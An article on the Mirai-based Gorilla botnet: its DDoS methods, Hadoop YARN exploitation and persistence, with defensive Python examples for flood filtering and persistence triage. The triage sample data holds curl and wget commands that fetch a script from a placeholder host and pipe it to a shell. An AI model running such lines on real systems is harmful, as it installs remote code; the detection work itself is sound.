Cybersecurity researchers have discovered a new botnet malware family named Gorilla [1] [6], also known as GorillaBot [1]. The malware is built on the leaked Mirai botnet source code and has been responsible for a large volume of distributed denial-of-service (DDoS) attacks worldwide, affecting organizations across many sectors.

## Description

Cybersecurity researchers have identified a new botnet malware family named Gorilla (also known as GorillaBot) [1] [6], a variant of the leaked Mirai botnet source code [1] [6]. Between September 4 and September 27, 2024 [1] [3] [6], the botnet issued more than 300,000 DDoS attack commands, roughly 20,000 per day, against around 20,000 organizations in more than 100 countries. The most affected countries were the US, China [2] [3] [4] [5] [6], Canada [2] [3] [4] [5] [6], and Germany [3] [4] [5] [6], with nearly 4,000 targeted organizations located in the US alone. Sectors hit include universities [3], government websites [3], telecoms [3], banks [3] [5], and the gaming industry.

Gorilla employs a variety of DDoS attack methods, including UDP flood [2] [3] [4] [6], TCP ACK Bypass flood [2] [3] [6], Valve Source Engine (VSE) flood [2] [3] [6], SYN flood [2] [3] [6], and ACK flood [2] [3] [4] [6]. Because UDP is connectionless and involves no handshake, the bots can forge arbitrary source IP addresses [6], so the flood cannot be traced back to the infected devices and is hard to block by source address; the resulting traffic volume overwhelms the target network. A substantial share of the attacks were UDP floods, the protocol widely used by gaming and video-streaming services [4]. A further significant share were TCP ACK Bypass floods, which direct a large volume of spoofed TCP acknowledgement (ACK) packets at specific ports [4].

The botnet supports multiple CPU architectures [3] [6], including ARM [3] [4] [6], MIPS [2] [3] [4] [6], x86_64 [2] [3] [4] [6], and x86 [3] [4] [6], and connects to one of five predefined command-and-control (C2) servers to receive DDoS commands [3] [6]. Gorilla implements a total of 19 different DDoS attack methods, which complicates defense [4], because each attack vector calls for its own mitigation [4]. For instance [4], UDP floods are mitigated with rate limiting and by dropping traffic to ports that have no listener [4], whereas SYN and ACK floods are handled by stateful firewalls and intrusion-detection systems that track TCP connection state and pass only ACK packets belonging to a connection they have actually seen established [4].
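To make the difference between those mitigations concrete, here is an added toy example (not code from any of the cited reports) of a stateful filter that applies them to a stream of packet records: it caps half-open handshakes per service so a SYN flood cannot exhaust the backlog, drops any ACK for a connection it never saw a SYN for (which is how a spoofed ACK flood looks to a stateful device), and token-bucket rate-limits UDP to listening ports while discarding UDP to closed ones. The packet records, addresses (from the documentation ranges) and the choice of port 27015 as the listening game-server port are constructed sample data, not captured traffic.

```python
"""Toy stateful filter for the TCP/UDP mitigations discussed in the text.
Added illustration, not code from the cited reports; all packets below are
constructed sample data (documentation-range addresses), not captured traffic.
"""
from collections import defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class Pkt:
    ts: float        # seconds since start of the (constructed) capture
    proto: str       # "tcp" or "udp"
    src: str
    dst: str
    dport: int
    flags: str = ""  # TCP flags as letters: "S" = SYN, "A" = ACK, "PA", ...


class StatefulFilter:
    def __init__(self, udp_open_ports, udp_pps_limit, max_half_open):
        self.udp_open_ports = set(udp_open_ports)
        self.udp_pps_limit = udp_pps_limit
        self.max_half_open = max_half_open
        self.tcp_state = {}                # (src, dst, dport) -> "half_open" | "established"
        self.half_open = defaultdict(set)  # (dst, dport) -> keys still waiting for the client's ACK
        self.udp_bucket = {}               # dport -> (tokens, last_ts) token bucket per listening port
        self.dropped = defaultdict(int)    # drop reason -> count
        self.accepted = 0

    def handle(self, p):
        ok, reason = self._tcp(p) if p.proto == "tcp" else self._udp(p)
        if ok:
            self.accepted += 1
        else:
            self.dropped[reason] += 1
        return ok

    def _tcp(self, p):
        key = (p.src, p.dst, p.dport)
        svc = (p.dst, p.dport)
        if p.flags == "S":
            # New connection attempt: refuse once this service already has too
            # many handshakes pending (SYN-flood backpressure).
            if len(self.half_open[svc]) >= self.max_half_open:
                return False, "syn_flood"
            self.tcp_state[key] = "half_open"
            self.half_open[svc].add(key)
            return True, ""
        state = self.tcp_state.get(key)
        if state is None:
            # ACK (or any non-SYN segment) for a connection we never saw a SYN for.
            return False, "tcp_no_state"
        if state == "half_open" and "A" in p.flags:
            self.tcp_state[key] = "established"   # client's third handshake packet
            self.half_open[svc].discard(key)
        return True, ""

    def _udp(self, p):
        if p.dport not in self.udp_open_ports:
            return False, "udp_closed_port"        # nothing listens there: never forward
        tokens, last = self.udp_bucket.get(p.dport, (self.udp_pps_limit, p.ts))
        tokens = min(self.udp_pps_limit, tokens + (p.ts - last) * self.udp_pps_limit)
        if tokens < 1:
            self.udp_bucket[p.dport] = (tokens, p.ts)
            return False, "udp_flood"
        self.udp_bucket[p.dport] = (tokens - 1, p.ts)
        return True, ""


def run(packets, udp_open_ports=(27015,), udp_pps_limit=10, max_half_open=32):
    """Feed packets through a fresh filter and return accept/drop counts."""
    f = StatefulFilter(udp_open_ports, udp_pps_limit, max_half_open)
    for p in packets:
        f.handle(p)
    return {"accepted": f.accepted, "dropped": dict(f.dropped)}


# Constructed sample traffic toward one server (192.0.2.10).
SAMPLE = (
    [Pkt(0.0, "tcp", "10.0.0.5", "192.0.2.10", 443, "S"),
     Pkt(0.1, "tcp", "10.0.0.5", "192.0.2.10", 443, "A")]                               # real handshake
    + [Pkt(1.0, "tcp", f"203.0.113.{i}", "192.0.2.10", 443, "A") for i in range(1, 6)]   # spoofed ACK flood
    + [Pkt(1.5, "tcp", f"198.51.100.{i}", "192.0.2.10", 80, "S") for i in range(1, 51)]  # SYN flood: 50 half-open attempts
    + [Pkt(2.0, "udp", "198.51.100.200", "192.0.2.10", 27015) for _ in range(20)]        # UDP burst at the game-server port
    + [Pkt(2.0, "udp", "198.51.100.201", "192.0.2.10", 9999)]                            # UDP to a port with no listener
)

if __name__ == "__main__":
    print(run(SAMPLE))
```

With the defaults (limit of 10 UDP packets per second to the open port, 32 pending handshakes per service) the legitimate handshake and the first 32 SYNs pass, every spoofed ACK is dropped for lack of state, half of the UDP burst is shed by the bucket, and the single packet to the closed port is discarded outright. Real devices add timeouts for stale half-open entries and per-source limits; this example deliberately shows only the state checks the paragraph describes.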

Additionally, Gorilla exploits a security flaw in Apache Hadoop YARN RPC to achieve remote code execution [3] [5] [6], a weakness that has been abused in the wild since at least 2021 [6]. The botnet maintains persistence on infected hosts by creating a unit file named custom.service in "/etc/systemd/system/" [3] [6], which systemd starts automatically at boot [3] [6]. It also modifies system files so that a shell script fetched from a remote server is executed at startup or user login [3], adding similar commands to "/etc/inittab", "/etc/profile", and "/boot/bootcmd".
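A triage check for exactly those persistence locations, as an added example that is not taken from the cited reports: it inspects the command-carrying directives of unit files under /etc/systemd/system/ together with /etc/inittab, /etc/profile and /boot/bootcmd, and flags lines that download a script from a remote host, pipe it into a shell, or launch something from a world-writable directory. The file contents in the sample are constructed, and the IP address and script name in them are placeholders, not real indicators of compromise; the only thing taken from the text is the set of paths and the custom.service name.

```python
"""Triage check for the Linux persistence locations described in the text.
Added illustration, not code from the cited reports. SAMPLE_FS is constructed;
the URL in it is a placeholder (documentation-range IP), not a real indicator.
"""
import glob
import os
import re
from pathlib import PurePosixPath

WATCHED_FILES = {"/etc/inittab", "/etc/profile", "/boot/bootcmd"}
SYSTEMD_DIR = "/etc/systemd/system"

# A downloader followed (on the same command) by a remote URL scheme.
REMOTE_FETCH = re.compile(r"\b(curl|wget|tftp|ftpget)\b[^|;&\n]*\b(https?|ftp|tftp)://", re.I)
# Output piped straight into a shell interpreter.
PIPE_TO_SHELL = re.compile(r"\|\s*(ba|a|da)?sh\b")
# Execution of a path in a world-writable / tmpfs location.
WRITABLE_EXEC = re.compile(r"(^|[\s=\"'])(/tmp|/dev/shm|/var/tmp|/run/user)/\S+")
# Only these systemd directives carry commands worth inspecting.
EXEC_DIRECTIVE = re.compile(r"Exec(StartPre|StartPost|Start|Reload)\s*=")


def classify_line(line):
    """Return the indicator names a single line matches (empty list if clean)."""
    hits = []
    if REMOTE_FETCH.search(line):
        hits.append("remote_fetch")
    if PIPE_TO_SHELL.search(line):
        hits.append("pipe_to_shell")
    if WRITABLE_EXEC.search(line):
        hits.append("exec_from_writable_dir")
    return hits


def scan_persistence(files):
    """files: {path: text}. Returns a list of findings sorted by path and line."""
    findings = []
    for path, text in files.items():
        is_unit = str(PurePosixPath(path).parent) == SYSTEMD_DIR and path.endswith(".service")
        if not (is_unit or path in WATCHED_FILES):
            continue
        for n, line in enumerate(text.splitlines(), 1):
            stripped = line.strip()
            if not stripped or stripped.startswith("#"):
                continue
            if is_unit and not EXEC_DIRECTIVE.match(stripped):
                continue                      # [Unit]/[Install] keys carry no commands
            hits = classify_line(stripped)
            if hits:
                findings.append({"path": path, "line": n, "indicators": hits, "text": stripped})
    return sorted(findings, key=lambda f: (f["path"], f["line"]))


def collect_from_host():
    """Read the watched locations from the running system (root may be needed)."""
    files = {}
    for path in sorted(WATCHED_FILES) + sorted(glob.glob(SYSTEMD_DIR + "/*.service")):
        if os.path.isfile(path):
            with open(path, errors="replace") as fh:
                files[path] = fh.read()
    return files


# Constructed sample filesystem: one planted unit, one benign unit, one planted
# inittab entry, one dropper launched from /dev/shm via /etc/profile.
SAMPLE_FS = {
    "/etc/systemd/system/custom.service": (
        "[Unit]\nDescription=custom\n\n[Service]\n"
        "ExecStart=/bin/sh -c 'curl -s http://203.0.113.77/x.sh | sh'\nRestart=always\n\n"
        "[Install]\nWantedBy=multi-user.target\n"),
    "/etc/systemd/system/sshd.service": "[Service]\nExecStart=/usr/sbin/sshd -D\n",
    "/etc/inittab": "id:3:initdefault:\n::sysinit:/bin/sh -c 'wget -qO- http://203.0.113.77/x.sh | sh'\n",
    "/etc/profile": "export PATH=/usr/local/bin:$PATH\n/dev/shm/.x &\n",
    "/boot/bootcmd": "echo boot\n",
}

if __name__ == "__main__":
    for finding in scan_persistence(SAMPLE_FS):
        print(finding)
    # On a live host: for finding in scan_persistence(collect_from_host()): print(finding)
```

The pattern-based checks are a starting point for triage, not a verdict: a unit named custom.service is not itself malicious, and a rewritten /etc/profile is only suspicious because of what the added line does. Anything flagged should be confirmed by pulling the referenced script or binary and by checking the file modification times against the suspected compromise window.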

Gorilla employs counter-detection techniques, using encryption algorithms similar to those used by the Keksec group to conceal key information and to keep long-term control over infected IoT devices and cloud hosts [3] [6]. Together with its persistence mechanisms, this lets the botnet remain undetected for extended periods. The rapid expansion of Gorilla and its capacity for large-scale DDoS attacks make it a significant threat to businesses, governments [3] [5], and individuals, particularly as the number of exposed IoT devices keeps growing. Organizations in the targeted sectors should strengthen their defenses accordingly.

## Conclusion

The emergence of the Gorilla botnet underscores the scale of DDoS threats facing organizations worldwide. Its ability to launch large-scale attacks with 19 different methods, and to spread by exploiting a known vulnerability, puts many sectors at risk. To counter it, organizations should combine rate limiting, stateful firewalls [4], and intrusion detection systems [4] with patching of exposed services such as Hadoop YARN and monitoring of the persistence locations it abuses. As the number of Internet-exposed IoT devices continues to rise, keeping defenses current and tracking how such botnets evolve will remain essential.

## References

[1] https://cyber.vumetric.com/security-news/2024/10/07/new-gorilla-botnet-launches-over-300000-ddos-attacks-across-100-countries/
[2] https://www.cyclonis.com/pt/gorilla-botnet-unleashes-over-300000-ddos-attacks-across-100-countries/
[3] https://patabook.com/technology/2024/10/07/new-gorilla-botnet-launches-over-300000-ddos-attacks-across-100-countries/
[4] https://www.darkreading.com/cyberattacks-data-breaches/gorillabot-goes-ape-cyberattacks-worldwide
[5] https://thenimblenerd.com/article/gorillabot-on-the-loose-new-malware-swings-into-global-cyber-chaos/
[6] https://thehackernews.com/2024/10/new-gorilla-botnet-launches-over-300000.html